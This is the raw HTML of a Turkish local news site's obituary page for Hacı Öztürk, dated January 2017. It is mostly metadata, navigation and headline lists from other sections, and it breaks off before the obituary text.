<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <title>Hacı Öztürk 76 yaşında</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Taşburun (Ketizmen) mahallesinden merhum Cuma ve Beyli Öztürk ailesinin oğlu"> <meta name="keywords" content=""> <meta name="news_keywords" content=""> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Hacı Öztürk 76 yaşında"> <meta property="og:description" content="Taşburun (Ketizmen) mahallesinden merhum Cuma ve Beyli Öztürk ailesinin oğlu"> <meta property="og:url" content="http://www.elbistaninsesi.com/vefatlar/haci-ozturk-76-yasinda-h37594.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2017/01/haci_ozturk_76_yasinda_h37594_09824.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Hacı Öztürk 76 yaşında"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/vefatlar/haci-ozturk-76-yasinda-h37594.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="#"> <meta name="twitter:title" content="Hacı Öztürk 76 yaşında"> <meta name="twitter:description" content="Taşburun (Ketizmen) mahallesinden merhum Cuma ve Beyli Öztürk ailesinin oğlu"> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2017/01/haci_ozturk_76_yasinda_h37594_09824.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2017/01/haci_ozturk_76_yasinda_h37594_09824.jpg" /> <meta itemprop="headline" content="Hacı Öztürk 76 yaşında" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/haci_ozturk_76_yasinda_h37594_09824.jpg" /> <meta itemprop="articleSection" content="Vefatlar" name="section" /> <meta itemprop="dateCreated" content="2017-01-21T15:10:13+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2017/01/haci_ozturk_76_yasinda_h37594_09824.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '9'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = '#'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> </head> <body> <div class="row-fluid text-center reklam1"><a href="http://www.elbistaninsesi.com/banner.php?id=54" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/&w=940&h=90&q=90" width="940" height="90" style="width:940px;height: 90px;border:0" alt="banner54" /></a></div> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">3.7912</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">4.0490</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">146.627</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">83067</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/muhtarlardan-cami-tarlasi-tepkisi-h37327.html" title="Muhtarlardan ‘cami tarlası’ tepkisi" >Muhtarlardan ‘cami tarlası’ tepkisi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/ekonomi/aelde-7-milyon-500-bin-ton-komur-uretildi-h37249.html" title="AEL’de, 7 milyon 500 bin ton kömür üretildi" >AEL’de, 7 milyon 500 bin ton kömür üretildi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanspor-gol-oldu-yagdi-h37078.html" title="Elbistanspor, gol oldu yağdı" >Elbistanspor, gol oldu yağdı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanli-2-polis-memuru-hain-saldirida-yaralandi-h37068.html" title="Elbistanlı 2 polis memuru hain saldırıda yaralandı" >Elbistanlı 2 polis memuru hain saldırıda yaralandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/4-firinciya-ornek-isyeri-belgesi-takdim-edildi-h37009.html" title="4 fırıncıya ‘Örnek İşyeri’ belgesi takdim edildi" >4 fırıncıya ‘Örnek İşyeri’ belgesi takdim edildi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/hasta-sayisi-35-bin-sebebi-kirlilik-ve-dikkatsizlik-h35965.html" title="Hasta sayısı 35 bin, sebebi: KİRLİLİK VE DİKKATSİZLİK" >Hasta sayısı 35 bin, sebebi: KİRLİLİK VE DİKKATSİZLİK</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/sehit-yarbay-ozer-dualarla-ugurlandi-h35408.html" title="Şehit Yarbay Özer, dualarla uğurlandı" >Şehit Yarbay Özer, dualarla uğurlandı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistan-sehit-acisiyla-kara-bayrami-yasadi-h35406.html" title="Elbistan, şehit acısıyla kara bayramı yaşadı" >Elbistan, şehit acısıyla kara bayramı yaşadı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/giresundaki-helikopter-kazasinda-elbistanli-yarbay-sehit-oldu-h35405.html" title="Giresun’daki helikopter kazasında Elbistanlı Yarbay şehit oldu" >Giresun’daki helikopter kazasında Elbistanlı Yarbay şehit oldu</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="7972fdd40902628131a34ca89b6f410629452b2c" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/logo2.png" alt="Hacı Öztürk 76 yaşında" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" class="current" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="İhale İlanları" href="http://www.elbistaninsesi.com/ihale-ilanlari" id="k15" >İhale İlanları</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/fethiye-cuce-30-yasinda-h37596.html" title="Fethiye Cüce 30 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/fethiye_cuce_30_yasinda_h37596_ea724.jpg" alt="Fethiye Cüce 30 yaşında" /> Fethiye Cüce 30 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/halide-ilhan-58-yasinda-h37595.html" title="Halide İlhan 58 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/halide_ilhan_58_yasinda_h37595_e4f32.jpg" alt="Halide İlhan 58 yaşında" /> Halide İlhan 58 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/haci-ozturk-76-yasinda-h37594.html" title="Hacı Öztürk 76 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/haci_ozturk_76_yasinda_h37594_09824.jpg" alt="Hacı Öztürk 76 yaşında" /> Hacı Öztürk 76 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/servet-baylar-94-yasinda-h37590.html" title="Servet Baylar 94 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/servet_baylar_94_yasinda_h37590_c3d97.jpg" alt="Servet Baylar 94 yaşında" /> Servet Baylar 94 yaşında</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/odullu-proje-my-world-elbistandan-kira-oder-gibi-ev-sahibi-olma-imkani-h37592.html" title="Ödüllü proje My World Elbistan’dan kira öder gibi ev sahibi olma imkanı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/odullu_proje_my_world_elbistandan_kira_oder_gibi_ev_sahibi_olma_imkani_h37592_82d64.jpg" alt="Ödüllü proje My World Elbistan’dan kira öder gibi ev sahibi olma imkanı" /> Ödüllü proje My World Elbistan’dan kira öder gibi ev sahibi olma imkanı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/2017-yili-icin-talep-basvurulari-basladi-h37591.html" title="2017 yılı için talep başvuruları başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/2017_yili_icin_talep_basvurulari_basladi_h37591_56a41.jpg" alt="2017 yılı için talep başvuruları başladı" /> 2017 yılı için talep başvuruları başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/feto-uyesi-doktor-tutuklandi-h37589.html" title="FETÖ üyesi doktor tutuklandı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/feto_uyesi_doktor_tutuklandi_h37589_70204.jpg" alt="FETÖ üyesi doktor tutuklandı" /> FETÖ üyesi doktor tutuklandı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/otomobiller-carpisti-2si-cocuk-6-yarali-h37586.html" title="Otomobiller çarpıştı: 2’si çocuk 6 yaralı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/otomobiller_carpisti_2si_cocuk_6_yarali_h37586_11847.JPG" alt="Otomobiller çarpıştı: 2’si çocuk 6 yaralı" /> Otomobiller çarpıştı: 2’si çocuk 6 yaralı</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/unal-diktatorluk-geliyor-diyenler-duzenlemeyi-iyi-okusun-h37560.html" title="Ünal: “Diktatörlük geliyor diyenler, düzenlemeyi iyi okusun”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/unal_diktatorluk_geliyor_diyenler_duzenlemeyi_iyi_okusun_h37560_3fd16.JPG" alt="Ünal: “Diktatörlük geliyor diyenler, düzenlemeyi iyi okusun”" /> Ünal: “Diktatörlük geliyor diyenler, düzenlemeyi iyi okusun”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/torun-a-termik-onergesi-meclise-geliyor-h37548.html" title="Tor’un, A Termik önergesi Meclis’e geliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/torun_a_termik_onergesi_meclise_geliyor_h37548_efcf3.JPG" alt="Tor’un, A Termik önergesi Meclis’e geliyor" /> Tor’un, A Termik önergesi Meclis’e geliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/ak-parti-afsin-ilce-baskani-kirbiyik-istifa-etti-h37488.html" title="AK Parti Afşin İlçe Başkanı Kırbıyık, istifa etti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/ak_parti_afsin_ilce_baskani_kirbiyik_istifa_etti_h37488_8eefe.jpg" alt="AK Parti Afşin İlçe Başkanı Kırbıyık, istifa etti" /> AK Parti Afşin İlçe Başkanı Kırbıyık, istifa etti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/chpli-kadinlar-dayanisma-toplantisinda-bulustu-h37447.html" title="CHP’li kadınlar, dayanışma toplantısında buluştu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/chpli_kadinlar_dayanisma_toplantisinda_bulustu_h37447_3ad7a.jpg" alt="CHP’li kadınlar, dayanışma toplantısında buluştu" /> CHP’li kadınlar, dayanışma toplantısında buluştu</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/tsm-saglikli-beslenme-etkinliklerini-surduruyor-h37500.html" title="TSM, sağlıklı beslenme etkinliklerini sürdürüyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/tsm_saglikli_beslenme_etkinliklerini_surduruyor_h37500_9dbbb.jpg" alt="TSM, sağlıklı beslenme etkinliklerini sürdürüyor" /> TSM, sağlıklı beslenme etkinliklerini sürdürüyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/yeni-adsmnin-proje-ihalesi-yapildi-h37423.html" title="Yeni ADSM’nin proje ihalesi yapıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/yeni_adsmnin_proje_ihalesi_yapildi_h37423_b56ed.JPG" alt="Yeni ADSM’nin proje ihalesi yapıldı" /> Yeni ADSM’nin proje ihalesi yapıldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/kaymakam-akkoyundan-kan-bagisi-icin-seferberlik-cagrisi-h37406.html" title="Kaymakam Akkoyun’dan kan bağışı için seferberlik çağrısı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/kaymakam_akkoyundan_kan_bagisi_icin_seferberlik_cagrisi_h37406_a225c.JPG" alt="Kaymakam Akkoyun’dan kan bağışı için seferberlik çağrısı" /> Kaymakam Akkoyun’dan kan bağışı için seferberlik çağrısı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/tsmnin-saglikli-beslenme-ve-fiziksel-aktivite-etkinlikleri-suruyor-h37393.html" title="TSM’nin, sağlıklı beslenme ve fiziksel aktivite etkinlikleri sürüyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/tsmnin_saglikli_beslenme_ve_fiziksel_aktivite_etkinlikleri_suruyor_h37393_e6fd6.jpg" alt="TSM’nin, sağlıklı beslenme ve fiziksel aktivite etkinlikleri sürüyor" /> TSM’nin, sağlıklı beslenme ve fiziksel aktivite etkinlikleri sürüyor</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/baskan-erkoctan-tatil-mesaji-h37578.html" title="Başkan Erkoç’tan tatil mesajı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/baskan_erkoctan_tatil_mesaji_h37578_07288.JPG" alt="Başkan Erkoç’tan tatil mesajı" /> Başkan Erkoç’tan tatil mesajı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/35-bin-ogrenci-karne-aldi-h37577.html" title="35 bin öğrenci karne aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/35_bin_ogrenci_karne_aldi_h37577_55d3c.JPG" alt="35 bin öğrenci karne aldı" /> 35 bin öğrenci karne aldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kuran-bulbullerinin-karne-heyecani-h37565.html" title="Kur’an bülbüllerinin karne heyecanı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/kuran_bulbullerinin_karne_heyecani_h37565_b6167.JPG" alt="Kur’an bülbüllerinin karne heyecanı" /> Kur’an bülbüllerinin karne heyecanı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/ogrencileri-karne-heyecani-sardi-h37564.html" title="Öğrencileri karne heyecanı sardı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/ogrencileri_karne_heyecani_sardi_h37564_97359.JPG" alt="Öğrencileri karne heyecanı sardı" /> Öğrencileri karne heyecanı sardı</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-vucut-gelistirme-hizmet-agini-genisletti-h37534.html" title="Elbistan Vücut Geliştirme hizmet ağını genişletti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/elbistan_vucut_gelistirme_hizmet_agini_genisletti_h37534_4a07c.JPG" alt="Elbistan Vücut Geliştirme hizmet ağını genişletti" /> Elbistan Vücut Geliştirme hizmet ağını genişletti</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-evinde-pazarcik-aksuspora-yenildi-h37524.html" title="Elbistanspor, evinde Pazarcık Aksuspor’a yenildi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/elbistanspor_evinde_pazarcik_aksuspora_yenildi_h37524_cd451.jpg" alt="Elbistanspor, evinde Pazarcık Aksuspor’a yenildi" /> Elbistanspor, evinde Pazarcık Aksuspor’a yenildi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanda-ilk-defa-mas-guresi-duzenlenecek-h37516.html" title="Elbistan’da ilk defa Mas Güreşi düzenlenecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/elbistanda_ilk_defa_mas_guresi_duzenlenecek_h37516_1ec46.jpg" alt="Elbistan’da ilk defa Mas Güreşi düzenlenecek" /> Elbistan’da ilk defa Mas Güreşi düzenlenecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-ghsm-29-bin-kisiye-imkn-sagladi-h37489.html" title="Elbistan GHSM, 29 bin kişiye imkân sağladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/elbistan_ghsm_29_bin_kisiye_imkn_sagladi_h37489_a7993.jpg" alt="Elbistan GHSM, 29 bin kişiye imkân sağladı" /> Elbistan GHSM, 29 bin kişiye imkân sağladı</a> </div> </div></div><div class="katelement kat_k15"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/madeni-yag-h37587.html" title="MADENİ YAĞ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/madeni_yag_h37587_cfd84.jpg" alt="MADENİ YAĞ" /> MADENİ YAĞ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/tc-elbistan-icra-dairesi-h37573.html" title="T.C. ELBİSTAN İCRA DAİRESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/tc_elbistan_icra_dairesi_h37573_528b0.jpg" alt="T.C. ELBİSTAN İCRA DAİRESİ" /> T.C. ELBİSTAN İCRA DAİRESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/tc-elbistan-icra-dairesi-h37556.html" title="T.C. ELBİSTAN İCRA DAİRESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/tc_elbistan_icra_dairesi_h37556_96765.jpg" alt="T.C. ELBİSTAN İCRA DAİRESİ" /> T.C. ELBİSTAN İCRA DAİRESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ihale-ilanlari/elektrik-uretim-as-genel-mudurlugu-euas-h37555.html" title="ELEKTRİK ÜRETİM A.Ş GENEL MÜDÜRLÜĞÜ (EÜAŞ)"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/elektrik_uretim_as_genel_mudurlugu_euas_h37555_f6d97.jpg" alt="ELEKTRİK ÜRETİM A.Ş GENEL MÜDÜRLÜĞÜ (EÜAŞ)" /> ELEKTRİK ÜRETİM A.Ş GENEL MÜDÜRLÜĞÜ (EÜAŞ)</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/37-milyon-700-bin-metrekupluk-kazi-programi-euasa-sunuldu-h37593.html" title="37 milyon 700 bin metreküplük kazı programı EÜAŞ’a sunuldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/37_milyon_700_bin_metrekupluk_kazi_programi_euasa_sunuldu_h37593_841ad.JPG" alt="37 milyon 700 bin metreküplük kazı programı EÜAŞ’a sunuldu" /> 37 milyon 700 bin metreküplük kazı programı EÜAŞ’a sunuldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baskan-paksoy-banka-mudurleri-ile-nefes-kredisini-gorustu-h37538.html" title="Başkan Paksoy, banka müdürleri ile Nefes Kredisi’ni görüştü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/baskan_paksoy_banka_mudurleri_ile_nefes_kredisini_gorustu_h37538_5f9d9.JPG" alt="Başkan Paksoy, banka müdürleri ile Nefes Kredisi’ni görüştü" /> Başkan Paksoy, banka müdürleri ile Nefes Kredisi’ni görüştü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/nefes-kredisinin-ust-limiti-100-bin-liraya-yukseltildi-h37520.html" title="Nefes kredisinin üst limiti 100 bin liraya yükseltildi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/nefes_kredisinin_ust_limiti_100_bin_liraya_yukseltildi_h37520_e37d9.JPG" alt="Nefes kredisinin üst limiti 100 bin liraya yükseltildi" /> Nefes kredisinin üst limiti 100 bin liraya yükseltildi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/elbistanda-807-issiz-is-sahibi-oldu-h37517.html" title="Elbistan’da 807 işsiz, iş sahibi oldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/elbistanda_807_issiz_is_sahibi_oldu_h37517_c8eed.jpg" alt="Elbistan’da 807 işsiz, iş sahibi oldu" /> Elbistan’da 807 işsiz, iş sahibi oldu</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/2017-yili-icin-talep-basvurulari-basladi-h37591.html" title="2017 yılı için talep başvuruları başladı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/01/uruguay_dana_2.jpg" alt="2017 yılı için talep başvuruları başladı" class="pull-left" /> <div class="caption-line"><p>Daha önce 3 bin 500...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/mezarsiz-iscilerin-davasinda-6-yil-sonra-karar-cikti-h37580.html" title="Mezarsız işçilerin davasında 6 yıl sonra karar çıktı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/01/savcY_15_yYl_istedi_5.jpg" alt="Mezarsız işçilerin davasında 6 yıl sonra karar çıktı" class="pull-left" /> <div class="caption-line"><p>Mezarsız işçilerin davasında 6 yıl...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/egitim-kultur/baskan-erkoctan-tatil-mesaji-h37578.html" title="Başkan Erkoç’tan tatil mesajı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/01/baYkan_erkoc_karne.jpg" alt="Başkan Erkoç’tan tatil mesajı" class="pull-left" /> <div class="caption-line"><p>Başkan Erkoç’tan tatil mesajı</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/feto-uyesi-3-ogretmen-tutuklandi-h37570.html" title="FETÖ üyesi 3 öğretmen tutuklandı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2017/01/kpss-de-13-tutuklama-1459578596.jpg" alt="FETÖ üyesi 3 öğretmen tutuklandı" class="pull-left" /> <div class="caption-line"><p>FETÖ üyesi 3 öğretmen tutuklandı</p></div> </a> </li> </ul> </div> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i 